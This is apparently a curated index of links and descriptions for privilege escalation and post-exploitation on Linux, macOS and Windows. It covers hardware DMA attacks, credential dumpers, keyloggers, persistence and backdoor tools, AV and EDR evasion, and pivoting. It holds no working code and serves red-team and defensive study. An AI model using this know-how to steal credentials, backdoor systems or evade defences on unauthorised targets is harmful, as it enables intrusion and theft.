Privilege Escalation & Post-Exploitation
Table of Contents
- Privilege Escalation
- Post-Exploitation
- Linux Specific
- macOS Specific
- Windows Specific
- Pivoting
- Avoiding/Bypassing Anti-Virus/Whitelisting/Sandboxes/etc
- Payloads
Linux Defense Evasion | macOS Defense Evasion | Windows Defense Evasion |
---|---|---|
 | Application Whitelisting | Anti-Malware Scan Interface |
 | Endpoint Security Framework | Application Whitelisting |
 | Gatekeeper | Windows Defender |
 | System Integrity Protection | Microsoft ATA/P |
 | XProtect | Device Guard |
Privilege Escalation
- Hardware-based Privilege Escalation
  - Writeups
    - Windows DMA Attacks : Gaining SYSTEM shells using a generic patch
    - Where there's a JTAG, there's a way: Obtaining full system access via USB
    - Snagging creds from locked machines - mubix
    - Bash Bunny QuickCreds – Grab Creds from Locked Machines
  - PoisonTap
    - Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js.
  - Rowhammer
    - Exploiting the DRAM rowhammer bug to gain kernel privileges
    - Row hammer - Wikipedia
    - Another Flip in the Wall of Rowhammer Defenses
    - rowhammer.js
      - Rowhammer.js - A Remote Software-Induced Fault Attack in JavaScript
      - Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript
    - Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors
      - Abstract. Memory isolation is a key property of a reliable and secure computing system — an access to one memory address should not have unintended side effects on data stored in other addresses. However, as DRAM process technology scales down to smaller dimensions, it becomes more difficult to prevent DRAM cells from electrically interacting with each other. In this paper, we expose the vulnerability of commodity DRAM chips to disturbance errors. By reading from the same address in DRAM, we show that it is possible to corrupt data in nearby addresses. More specifically, activating the same row in DRAM corrupts data in nearby rows. We demonstrate this phenomenon on Intel and AMD systems using a malicious program that generates many DRAM accesses. We induce errors in most DRAM modules (110 out of 129) from three major DRAM manufacturers. From this we conclude that many deployed systems are likely to be at risk. We identify the root cause of disturbance errors as the repeated toggling of a DRAM row’s wordline, which stresses inter-cell coupling effects that accelerate charge leakage from nearby rows. We provide an extensive characterization study of disturbance errors and their behavior using an FPGA-based testing platform. Among our key findings, we show that (i) it takes as few as 139K accesses to induce an error and (ii) up to one in every 1.7K cells is susceptible to errors. After examining various potential ways of addressing the problem, we propose a low-overhead solution to prevent the errors.
  - Tools
    - Inception
      - Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
    - PCILeech
      - PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.
    - physmem
      - physmem is a physical memory inspection tool and local privilege escalation targeting macOS up through 10.12.1. It exploits either CVE-2016-1825 or CVE-2016-7617 depending on the deployment target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the same. They were patched in OS X El Capitan 10.11.5 and macOS Sierra 10.12.2, respectively.
    - rowhammer-test
      - Program for testing for the DRAM "rowhammer" problem
      - Tools for "Another Flip in the Wall"
Post-Exploitation
- General Post Exploitation
  - Tactics
    - MITRE ATT&CK
    - Adversarial Post Ex - Lessons from the Pros
    - Meta-Post Exploitation - Using Old, Lost, Forgotten Knowledge
    - Operating in the Shadows - Carlos Perez - DerbyCon(2015)
  - RTLO-attack
    - This is a really simple example on how to create a file with a Unicode right-to-left override character used to disguise the real extension of the file. In this example I disguise my .sh file as a .jpg file.
    - Blog
  - IPFuscator
    - IPFuscation is a technique that allows IP addresses to be represented in hexadecimal or decimal instead of the dotted-decimal encoding we are used to. IPFuscator allows us to easily convert to these alternative formats, which are interpreted in the same way.
    - Blogpost
  - Cuteit
    - A simple python tool to help you to social engineer, bypass whitelisting firewalls, potentially break regex rules for command line logging looking for IP addresses and obfuscate cleartext strings to C2 locations within the payload.
  - Living off the land: enterprise post-exploitation - Adam Reiser(Derbycon2018)
    - You've compromised that initial server and gained a foothold in the target network: congratulations! But wait - the shadow file has no hashes but root, the ssh keys have strong passphrases, and all the interesting traffic is encrypted - there's nothing of value here! Or is there? In this talk, I will explore post-exploitation techniques for turning your compromised bastion hosts into active credential interceptors under a variety of blue team monitoring scenarios.
- Execution
  - Tools
    - Shellpaste
      - Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
  - Payloads
    - Staged vs Stageless Handlers - OJ Reeves(2013)
    - Staged Payloads – What Pen Testers Should Know - Raphael Mudge(2013)
    - Deep Dive Into Stageless Meterpreter Payloads - OJ Reeves(2015)
    - Payload Types in the Metasploit Framework - offensive-security
  - Tools
    - Privilege Escalation
      - Finding Privilege Escalations with strace & SysInternals - Diplom Mathematiker(2017)
- Discovery
  - Browsers
    - Articles/Blogposts/Writeups
      - The Curious case of Firefox’s DevTools Storage - phl4nk(2020)
        - TL;DR – Firefox stores Dev tool console data permanently (unless manually deleted). Use the script to decompress the stored data and recover any potential goodies (mainly from devs running scripts in the console).
      - DevToolReader
        - Parses IndexedDB files - used to extract devtools console history
      - Retrieving Data from Thunderbird and Firefox - VIVI(2020)
    - Tools
      - EyeWitness
        - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
      - gowitness
        - A Golang web screenshot utility using Chrome Headless
      - WitnessMe
        - Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
      - Firepwd.py
        - Firepwd.py, an open source tool to decrypt Mozilla protected passwords
      - ThunderFox
        - Retrieve saved credentials from Thunderbird and Firefox.
  - File Discovery
    - localdataHog
      - String-based secret-searching tool (high entropy and regexes) based on truffleHog.
  - Packet Sniffing
    - See Network_Attacks.md
  - Finding your external IP
    - Curl any of the following addresses: ident.me, ifconfig.me or whatsmyip.akamai.com
    - Determine Public IP from CLI
  - Virtual Machine Detection (VM Detection)
    - How to determine Linux guest VM virtualization technology
    - Virtualbox
      - VirtualBox Detection Via WQL Queries
      - Bypassing VirtualBox Process Hardening on Windows
      - VBoxHardenedLoader
        - VirtualBox VM detection mitigation loader
- Exfiltration
  - Egress Testing
    - Egress Testing using PowerShell
    - Egress Buster Reverse Shell
      - Egress Buster Reverse Shell – Brute force egress ports until one is found and execute a reverse shell (from trustedsec)
    - Egress-Assess
      - Egress-Assess is a tool used to test egress data detection capabilities
  - File Transfer
    - Articles/Blogposts/Writeups
    - Platform-Neutral
      - Updog
        - Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.
      - ffsend
        - Easily and securely share files and directories from the command line through a safe, private and encrypted link using a single simple command. Files are shared using the Send service and may be up to 1GB (2.5GB authenticated). Others are able to download these files with this tool, or through their web browser.
- Persistence
  - List of low-level attacks/persistence techniques. HIGHLY RECOMMENDED!
  - How to Remotely Control Your PC (Even When it Crashes)
  - Backdooring X
  - Building a backdoored Binary
    - Pybuild
      - PyBuild is a tool for automating the pyinstaller method for compiling python code into an executable. This works on Windows, Linux, and OSX (pe and elf formats) (from trustedsec)
  - PYTHONPATH
    - I'm In Your $PYTHONPATH, Backdooring Your Python Programs
    - Pyekaboo
      - Pyekaboo is a proof-of-concept program that is able to hijack/hook/proxy Python module(s) thanks to the $PYTHONPATH variable. It's like "DLL Search Order Hijacking" for Python.
- Defense Evasion
- Credential Access
  - Keyloggers
    - HeraKeylogger
      - Chrome Keylogger Extension
    - Meltdown PoC for Reading Google Chrome Passwords
  - Vulnerability Scanners
    - Lying in Wait: Discovering and Exploiting Weaknesses in Automated Discovery Actions - Timothy Wright, Jacob Griffith(Derbycon2019)
      - Many IT administration systems on the market today implement some form of automated discovery process for identifying and cataloging new devices attached to the network. These discovery services often use valid credentials to access the devices for credentialed reviews/scans to improve the accuracy of the reporting. To make matters worse, these credentials are often elevated on the network and potentially whitelisted from any deception or endpoint protection suites. In this talk, we will outline several ways to abuse these services to gain legitimate credentials for a given network. Specifically, our research focused on a couple common security and management systems, but the implications are widespread. Research and tools to be released at con to help red teams demo risk.
- Lateral Movement
  - 3rd-Party Services
  - Browser Pivoting
    - Browser Pivot for Chrome - ijustwannaredteam
      - Today’s post is about Browser Pivoting with Chrome. For anyone unaware of Browser Pivoting, it’s a technique which essentially leverages an exploited system to gain access to the browser’s authenticated sessions. This is not a new technique; in fact, Raphael Mudge wrote about it in 2013. Detailed in the linked post, the Browser Pivot module for Cobalt Strike targets IE only, and as far as I know, cannot be used against Chrome. In this post we’re trying to achieve a similar result while taking a different approach – stealing the target’s Chrome profile in real time. Just an FYI, if you have the option to use Cobalt Strike’s Browser Pivot module instead, do so, it’s much cleaner.
    - Pass the Cookie and Pivot to the Clouds - wunderwuzzi
      - An adversary can pivot from a compromised host to Web Applications and Internet Services by stealing authentication cookies from browsers and related processes. At the same time this technique bypasses most multi-factor authentication protocols.
- Collection
  - Tools
    - LaZagne
      - The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
    - DumpsterDiver
      - DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secrets like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords. Additionally, it allows creating simple search rules with basic conditions (e.g. report only csv files including at least 10 email addresses). The main idea of this tool is to detect any potential secret leaks. You can watch it in action in the demo video or read about all its features in this article.
    - SharpCloud
      - SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
    - Packet sniffing with powershell
- Miscellaneous
  - Redis
    - Redis post-exploitation - Pavel Toporkov(ZeroNights18)
      - We will overview the techniques of redis post-exploitation and present new ones. In the course of the talk, you will also find out what to do if a pentester or adversary has obtained access to redis.
- Unsorted
  - portia
    - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised.
  - JVM Post-Exploitation One-Liners
  - Oneliner-izer
    - Convert any Python file into a single line of code which has the same functionality.
Post-Exploitation Linux
- 101
  - More on Using Bash's Built-in /dev/tcp File (TCP/IP)
  - Bash Brace Expansion Cleverness - Jon Oberhide
  - Basic Linux Privilege Escalation - g0tmi1k
    - Not so much a script as a resource, g0tmi1k’s blog post here has led to so many privilege escalations on Linux systems it’s not funny. Would definitely recommend trying out everything on this post for enumerating systems.
- Discovery
  - Articles/Blogposts/Writeups
  - Account Discovery
  - Browser Bookmark Discovery
  - File and Directory Discovery
  - Network Service Scanning
    - Articles/Blogposts/Writeups
    - Tools
      - Baboossh
        - BabooSSH allows you, from a simple SSH connection to a compromised host, to quickly gather info on other SSH endpoints to pivot and compromise them.
  - Network Sniffing
  - Password Policy Discovery
  - Permission Groups Discovery
  - Process Discovery
    - Articles/Blogposts/Writeups
    - Tools
      - pspy
        - pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
  - Remote System Discovery
    - nullinux
      - nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided, nullinux will attempt to connect to the target using an SMB null session. Unlike many of the enumeration tools out there already, nullinux can enumerate multiple targets at once and when finished, creates a users.txt file of all users found on the host(s). This file is formatted for direct implementation and further exploitation. This program assumes Python 2.7 and the smbclient package are installed on the machine. Run the setup.sh script to check if these packages are installed.
  - Software Discovery
  - System Information Discovery
  - System Network Configuration Discovery
  - System Network Connections Discovery
  - System Owner/User Discovery
- Execution
  - Articles/Blogposts/Writeups
  - Tools
  - LoLBins
    - Articles/Blogposts/Writeups
    - Tools
      - GTFOBins
        - GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.
      - GTFOPlus
        - GTFOPlus is a helper script that relies on the GTFOBins repo to identify standard Linux binaries that could assist with privilege escalation.
  - Command and Scripting Interpreter
    - Bash
      - Tools
        - Orc
          - Orc is a post-exploitation framework for Linux written in Bash
  - Exploitation for Client Execution
  - Inter-Process Communication
  - Native API
    - Articles/Blogposts/Writeups
    - Tools
      - msf-elf-in-memory-execution
        - Post module for Metasploit to execute ELF in memory
  - Scheduled Task/Job
    - At
    - Launchd
    - Cron
  - Shared Modules
  - Software Deployment Tools
  - System Services
    - Launchctl
    - Service Execution
  - User Execution
    - Malicious Link
    - Malicious File
      - Articles/Blogposts/Writeups
      - Payloads
        - Tools
          - fireELF
            - fireELF is an open-source fileless Linux malware framework that is cross-platform and allows users to easily create and manage payloads. By default it comes with 'memfd_create', which is a new way to run Linux ELF executables completely from memory, without having the binary touch the hard drive.
- Persistence
  - Account Manipulation
    - Additional Azure Service Principal Credentials
    - Exchange Email Delegate Permissions
    - Add Office 365 Global Administrator Role
    - SSH Authorized Keys
  - BITS Jobs
  - Boot or Logon Autostart Execution
    - Registry Run Keys / Startup Folder
    - Authentication Package
    - Time Providers
    - Winlogon Helper DLL
    - Security Support Provider
    - Kernel Modules and Extensions
    - Re-opened Applications
    - LSASS Driver
    - Shortcut Modification
    - Port Monitors
    - Plist Modification
  - Boot or Logon Initialization Scripts
    - Logon Script (Windows)
    - Logon Script (Mac)
    - Network Logon Script
    - Rc.common
    - Startup Items
  - Browser Extensions
  - Compromise Client Software Binary
    - Tools
      - Debinject
        - Inject malicious code into .debs
  - Create Account
    - Local Account
    - Domain Account
    - Cloud Account
  - Create or Modify System Process
    - Launch Agent
    - Systemd Service
    - Windows Service
    - Launch Daemon
  - Event Triggered Execution
    - Change Default File Association
    - Screensaver
    - Windows Management Instrumentation Event Subscription
    - .bash_profile and .bashrc
    - Trap
    - LC_LOAD_DYLIB Addition
    - Netsh Helper DLL
    - Accessibility Features
    - AppCert DLLs
    - AppInit DLLs
    - Application Shimming
    - Image File Execution Options Injection
    - PowerShell Profile
    - Emond
    - Component Object Model Hijacking
  - External Remote Services
  - Hijack Execution Flow
    - Services File Permissions Weakness
    - Executable Installer File Permissions Weakness
    - Services Registry Permissions Weakness
    - Path Interception by Unquoted Path
    - Path Interception by PATH Environment Variable
    - Path Interception by Search Order Hijacking
    - DLL Search Order Hijacking
    - DLL Side-Loading
    - LD_PRELOAD
    - Dylib Hijacking
    - COR_PROFILER
  - Implant Container Image
  - Office Application Startup
    - Add-ins
    - Office Template Macros
    - Outlook Forms
    - Outlook Rules
    - Outlook Home Page
    - Office Test
  - Pre-OS Boot
    - System Firmware
    - Component Firmware
    - Bootkit
  - Scheduled Task/Job
    - At (Windows)
    - Scheduled Task
    - At (Linux)
    - Launchd
    - Cron
  - Server Software Component
    - SQL Stored Procedures
    - Transport Agent
    - Web Shell
  - Traffic Signaling
    - Port Knocking
  - Valid Accounts
    - Default Accounts
    - Domain Accounts
    - Local Accounts
    - Cloud Accounts
- Privilege Escalation
  - 101
  - Articles/Blogposts/Writeups
  - Exploits
    - Docker
    - Dirty COW
      - Huge Dirty COW
        - “Huge Dirty COW” (CVE-2017–1000405) The incomplete Dirty COW patch - Eylon Ben Yaakov
        - HugeDirtyCow PoC
          - A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405)
    - dirty_sock
      - dirty_sock - Linux privilege escalation exploit via snapd (CVE-2019-7304)
        - In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the blog posting here.
      - Linux Privilege Escalation via snapd (dirty_sock exploit)
    - Kernel-based
    - Miscellaneous Software
      - Vim/Neovim Arbitrary Code Execution via Modelines - CVE-2019-12735
        - Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.
      - [0day] [exploit] Compromising a Linux desktop using... 6502 processor opcodes on the NES?! - scarybeastsecurity
        - A vulnerability and a separate logic error exist in the gstreamer 0.10.x player for NSF music files. Combined, they allow for very reliable exploitation and the bypass of 64-bit ASLR, DEP, etc. The reliability is provided by the presence of a Turing complete “scripting” inside a music player. NSF files are music files from the Nintendo Entertainment System. Curious? Read on...
      - systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation
  - Techniques
    - Container-based
      - Using the docker command to root the host (totally not a security issue)
        - It is possible to do a few more things with docker besides working with containers, such as creating a root shell on the host, overwriting system configuration files, reading restricted stuff, etc.
      - Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials - Chris Moberly
    - Capabilities
    - Cron jobs
    - Exploitation for Privilege Escalation
    - GTFOBins
    - NFS
      - Linux Privilege Escalation using weak NFS permissions - Haider Mahmood
      - Linux Privilege Escalation using Misconfigured NFS - Raj Chandel
      - NFS weak permissions (Linux Privilege Escalation) - Touhid Shaikh
      - NFS, no_root_squash and SUID - Basic NFS Security - fullyautolinux
      - A tale of a lesser known NFS privesc - gquere
      - NFS - myexperiments.io
    - PATH
    - Process Injection
      - Shared Libraries
    - Setuid and Setgid
      - SUID - myexperiments.io
      - SUID Executables - NetbiosX
      - Tools
        - SUID3NUM
          - A standalone python script which utilizes python's built-in modules to find SUID bins, separate default bins from custom bins, cross-match those with bins in GTFOBins' repository & auto-exploit those, all with colors! ( ͡ʘ ͜ʖ ͡ʘ)
    - Sudo
    - Sudo Caching
    - Valid Accounts
    - Web Shell
    - Wildcards
    - Writable Files
      - uptux
        - Linux privilege escalation checks (systemd, dbus, socket fun, etc)
  - Solaris
    - uid=0 is deprecated: A trick unix-privesc-check doesn’t yet know - TMB
    - dtappgather-poc.sh
      - Exploit PoC reverse engineered from EXTREMEPARR which provides local root on Solaris 7 - 11 (x86 & SPARC). Uses an environment variable of the setuid binary dtappgather to manipulate file permissions and create a user-owned directory anywhere on the system (as root). Can then add a shared object to the locale folder and run setuid binaries with an untrusted library file.
  - Talks/Videos
  - Tools
    - LinEnum
      - This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This includes file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.
    - Linux_Exploit_Suggester
      - Linux Exploit Suggester; based on operating system release number. This program, run without arguments, will perform a 'uname -r' to grab the Linux operating system's release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. Additionally possible to provide the '-k' flag to manually enter the Kernel Version/Operating System Release Version.
    - linux-exploit-suggester
      - Linux privilege escalation auditing tool
    - Linux Exploit Suggester 2
      - Next-Generation Linux Kernel Exploit Suggester
    - LinuxPrivChecker
      - This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the sc
      - Github
    - Unix Privilege Escalation Checker
      - Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).
    - EvilAbigail
      - Initrd encrypted root fs attack
    - kernelpop
      - kernel privilege escalation enumeration and exploitation framework
    - GTFOPlus
      - GTFOPlus is a helper script that relies on the GTFOBins repo to identify standard Linux binaries that could assist with privilege escalation.
- Defense Evasion
  - Binary Padding
  - Clear Command History
  - Compile After Delivery
  - Connection Proxy
  - Disabling Security Tools
  - Endpoint Detection Response (EDR)
    - Zombie Ant Farm: A Kit For Playing Hide and Seek with Linux EDRs.
      - Zombie Ant Farm: Primitives and Offensive Tooling for Linux EDR evasion.
  - Execution Guardrails
- Credential Access
  - Bash History
    - Articles/Blogposts
    - Tools
  - Brute Force
    - Articles/Blogposts
    - Tools
  - Credential Dumping
    - Articles/Blogposts
      - Where 2 Worlds Collide: Bringing Mimikatz et al to UNIX - Tim(-Wadha) Brown
        - What this talk is about: Why a domain joined UNIX box matters to Enterprise Admins; How AD based trust relationships on UNIX boxes are abused; How UNIX admins can help mitigate the worst side effects;
      - linikatz
        - This repository contains all of the scripts and source code for "Where 2 Worlds Collide: Bringing Mimikatz et al to UNIX". In addition to the main linikatz.sh script, this also includes auditd policies, John the Ripper rules, Metasploit post-exploitation modules and fuzzers. More will follow in due course.
      - Kerberos Credential Thiever (GNU/Linux) - Ronan Loftus, Arne Zismer
        - Kerberos is an authentication protocol that aims to reduce the amount of sensitive data that needs to be sent across a network with lots of network resources that require authentication. This reduces the risk of having authentication data stolen by an attacker. Network Attached Storage devices, big data processing applications like Hadoop, databases and web servers commonly run on GNU/Linux machines that are integrated in a Kerberos system. Due to the sensitivity of the data these services deal with, their security is of great importance. A lot of research has been done on sniffing and replaying Kerberos credentials from the network. However, little work has been done on stealing credentials from Kerberos clients on GNU/Linux. We therefore investigate the feasibility of extracting and reusing Kerberos credentials from GNU/Linux machines. In this research we show that all the credentials can be extracted, independently of how they are stored on the client. We also show how these credentials can be reused to impersonate the compromised client. In order to improve the security of Kerberos, we also propose mitigations to these attacks.
      - Exfiltrating credentials via PAM backdoors & DNS requests - x-c3ll
    - Tools
      - linikatz
      - mimipenguin
        - A tool to dump the login password from the current Linux user
      - 3snake
        - Targeting rooted servers, reads memory from sshd and sudo system calls that handle password based authentication. Doesn't write any memory to the traced processes. Spawns a new process for every sshd and sudo command that is run. Listens for the proc event using netlink sockets to get candidate processes to trace. When it receives an sshd or sudo process, ptrace is attached and traces read and write system calls, extracting strings related to password based authentication.
      - Tickey
        - Tool to extract Kerberos tickets from Linux kernel keys. Paper
      - Impost3r
        - Impost3r is a tool that aims to steal many kinds of Linux passwords (including ssh, su, sudo), written in C
  - Credentials from Web Browsers
    - Articles/Blogposts
    - Tools
  - Credentials in Files
    - Articles/Blogposts
    - Tools
      - KeyTabExtract
        - KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files, which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm, Service Principal, Encryption Type and NTLM Hash.
      - swap_digger
        - swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purposes. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.
  - Exploitation for Credential Access
    - Articles/Blogposts
      - Triple-Fetch-Kernel-Creds
        - Attempt to steal kernel credentials from launchd + task_t pointer (Based on: CVE-2017-7047)
    - Tools
  - Input Capture
    - Articles/Blogposts
    - Tools
      - SudoHulk
        - This tool changes the sudo command, hooking the execve syscall using ptrace; tested under bash and zsh
  - Network Sniffing
    - Articles/Blogposts
    - Tools
  - Private Keys
    - Articles/Blogposts
    - Tools
  - Steal Web Session Cookie
    - Articles/Blogposts
    - Tools
  - Two-Factor Authentication Interception
    - Articles/Blogposts
    - Tools
- Lateral Movement
  - Application Deployment Software
  - Exploitation of Remote Services
  - Internal Spearphishing
  - Port Forwarding & Proxies
    - PortPush
      - PortPush is a small Bash utility used for pivoting into internal networks upon compromising a public-facing host.
  - Remote File Copy
  - Remote Services
    - RDP
      - The RDP Through SSH Encyclopedia - Carrie Roberts
        - I have needed to remind myself how to set up RDP access through an SSH connection so many times that I’ve decided to document it here for future reference. I hope it proves useful to you as well. I do “adversary simulation” for work and so I present this information using terms like “attacker” and “target” but this info is also useful for performing system administration tasks.
    - SSH
  - SSH Hijacking
  - Third-party Software
- Collection
  - Audio Capture
  - Automated Collection
  - Clipboard Data
  - Data from Information Repositories
  - Data from Local System
    - Tools
      - swap_digger
        - swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purposes. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.
  - Data from Network Shared Drive
  - Data from Removable Media
  - Data Staged
  - Input Capture
  - Screen Capture
Post-Exploitation OS X
-
Educational
-
Articles/Blogposts/Writeups
- The ‘app’ you can’t trash: how SIP is broken in High Sierra
- I can be Apple, and so can you - A Public Disclosure of Issues Around Third Party Code Signing Checks - Josh Pitts
- Targeting a macOS Application? Update Your Path Traversal Lists - James Sebree
- The Mac Malware of 2019 👾 a comprehensive analysis of the year's new malware - Patrick Wardle(2020)
-
Talks/Presentations/Videos
-
The Mouse is Mightier than the Sword - Patrick Wardle
- In this talk we'll discuss a vulnerability (CVE-2017-7150) found in all recent versions of macOS that allowed unprivileged code to interact with any UI component including 'protected' security dialogues. Armed with the bug, it was trivial to programmatically bypass Apple's touted 'User-Approved Kext' security feature, dump all passwords from the keychain, bypass 3rd-party security tools, and much more! And as Apple's patch was incomplete (surprise surprise) we'll drop an 0day that (still) allows unprivileged code to post synthetic events and bypass various security mechanisms on a fully patched macOS box!
-
Fire & Ice; Making and Breaking macOS firewalls - Patrick Wardle(Rootcon12)
-
When Macs Come Under ATT&CK - Richie Cyrus(Derbycon2018)
- Macs are becoming commonplace in corporate environments as an alternative to Windows systems. Developers, security teams, and executives alike favor the ease of use and full administrative control Macs provide. However, their systems are often joined to an active directory domain and ripe for attackers to leverage for initial access and lateral movement. Mac malware is evolving as Mac computers continue to grow in popularity. As a result, there is a need for proactive detection of attacks targeting MacOS systems in an enterprise environment. Despite advancements in MacOS security tooling for a single user/endpoint, little is known and discussed regarding detection at an enterprise level. This talk will discuss common tactics, techniques and procedures used by attackers on MacOS systems, as well as methods to detect adversary activity. We will take a look at known malware, mapping the techniques utilized to the MITRE ATT&CK framework. Attendees will leave equipped to begin hunting for evil lurking within their MacOS fleet.
-
- Slides
- In this talk, we’ll deep dive into recent security changes in MacOS Mojave & Safari and examine how these updates impacted actors of highly distributed malware in terms of number of infections, and more importantly - monetization. We’ll take a look at malware actors currently infecting machines in the wild (Bundlore and Genio to name a few) - and investigate how their tactics evolved after the update: From vectors of infection that bypass Gatekeeper, getting around the new TCC dialogs, hijacking search in a SIP protected Safari, to persistency and reinfection mechanisms that ultimately turn these ‘annoying PUPs’ into a fully fledged backdoored botnet.
-
Never Before Had Stierlitz Been So Close To Failure - Sergei Shevchenko(OBTS v2.0)
- Slides
- In this research, we'll dive into the installer's Mach-O binary to demonstrate how it piggy-backs on 'non-lazy' Objective-C classes, the way it dynamically unpacks its code section in memory and decrypts its config. An in-depth analysis will reveal the structure of its engine and a full scope of its hidden backdoor capabilities, anti-debugging, VM evasion techniques and other interesting tricks that are so typical to the Windows malware scene but aren’t commonly found in the unwanted apps that claim to be clean, particularly on the Mac platform. This talk reveals practical hands-on tricks used in Mach-O binary analysis under a Hackintosh VM guest, using LLDB debugger and IDA Pro disassembler, along with a very interesting marker found during such analysis. Curious to learn what that marker was? Willing to see how far the Mac-specific techniques evolved in relation to Windows malware?
-
- On macOS, defenders are watching shell scripts, a few common binaries, and python usage as easy tell-tale signs of red teamers. After all, it's very anomalous for HR to start running Python, Perl, or Ruby, and Marketing employees never run shell commands. As EDR products and defenders start to get more adept at looking into macOS, it's time for red teamers to start adapting as well. The question becomes: what should you use for an agent? If only macOS had a native scripting capability geared towards automating tasks common across all disciplines that is meant to be accessible even to non-programmers. In this talk, I'll go into the research, development, and usage of a new kind of agent based on JavaScript for Automation (JXA) and how it can be used in modern red teaming operations. This agent is incorporated into a broader open source project designed for collaborative red teaming I created called Apfell. I will discuss TTPs for doing reconnaissance, persistence, injection, and some keylogging all without using a shell command or spawning another scripting language. I will go into details of how JXA can be used to create an agent complete with encrypted key exchange for secure communications, domain fronting C2, and modular design to load or change key functionality on the fly. I will also cover the defensive considerations of these TTPs and how Apple is starting to secure these capabilities going forward.
-
An 0day in macOS - Patrick Wardle(OBTSv2.0)
- Slides
- Let's talk about a powerful 0day in macOS Mojave.
-
Yin and Yang: The Art of Attack and Defense on macOS - Patrick Wardle(JNUC2019)
- This session will begin by looking at recent malware infections targeting macOS and how (interactive) attackers can further penetrate the macOS enterprise. We'll then switch gears to talk about Apple's recent macOS security improvements, then wrap up by discussing security solutions today that are able to detect advanced macOS threats that may bypass Apple’s built-in security mechanisms.
-
Offensive Ops In macOS Environments by Cedric Owens(Greyhat2020)
-
- Tools
- Writeups that didn't fit elsewhere
-
Execution
-
General
- Apple Silicon Macs to Require Signed Code - @mjtsai(2020)
-
macOS Pop-Ups
- This repo serves as a collection of Red Team techniques and administrative tasks for various macOS versions that cause popups, what those popups look like, what permissions are being requested, where they're stored, and hopefully how to check for them before causing popups.
-
Unsorted
- macOS Research Outtakes - File Extensions - Adam Chester(2018)
- Launching Apfell Programmatically - Cedric Owens(2019)
- No Place Like Chrome - Christopher Ross(2019)
- Sparkling Payloads - Christopher Ross(2020)
- Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code - Andy Grant(2020)
- Audio Unit Plug-ins - Christopher Ross(2020)
- Abusing MacOS Entitlements for code execution - impost0r(2020)
- Lazarus Group Goes 'Fileless' an implant w/ remote download & in-memory execution - Patrick Wardle(2019)
-
Weaponizing a Lazarus Group Implant - Patrick Wardle(2020)
- repurposing a 1st-stage loader, to execute custom 'fileless' payloads
- Using macOS Internals for Post Exploitation - Cedric Owens(2019)
-
Command and Scripting Interpreter
-
AppleScript
-
101
- AppleScript Language Guide - developer.apple
-
AppleScript Fundamentals - developer.apple
- Section from the Language Guide
- AppleScript - William R. Cook(2006)
-
Scripting with AppleScript - developer.apple
- The following is a brief introduction to AppleScript scripts, tools for working with them, and information on using AppleScript scripts together with other scripting systems. For related documents, see the learning paths in Getting Started with AppleScript.
- AppleScript: The Definitive Guide, 2nd Edition - Matt Neuburg
- AppleScript Reference Library
- AppleScriptLanguageGuide - Apple
- Open Scripting Architecture - developer.apple.com
-
Articles/Blogposts/Writeups
